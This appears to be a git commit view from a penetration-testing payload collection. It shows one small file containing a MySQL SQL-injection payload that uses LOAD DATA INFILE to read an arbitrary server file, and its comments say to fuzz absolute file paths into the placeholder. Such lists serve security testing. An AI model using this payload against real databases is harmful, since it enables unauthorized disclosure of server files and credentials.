Quick clean up of locations

This commit is contained in:
g0tmi1k
2019-04-10 13:22:39 +01:00
parent 12751dbbf0
commit 3f2c0d33d2
16 changed files with 0 additions and 0 deletions

View File

@@ -0,0 +1,3 @@
# mysql local file disclosure through sqli
# fuzz interesting absolute filepath/filename into <filepath>
create table myfile (input TEXT); load data infile '<filepath>' into table myfile; select * from myfile;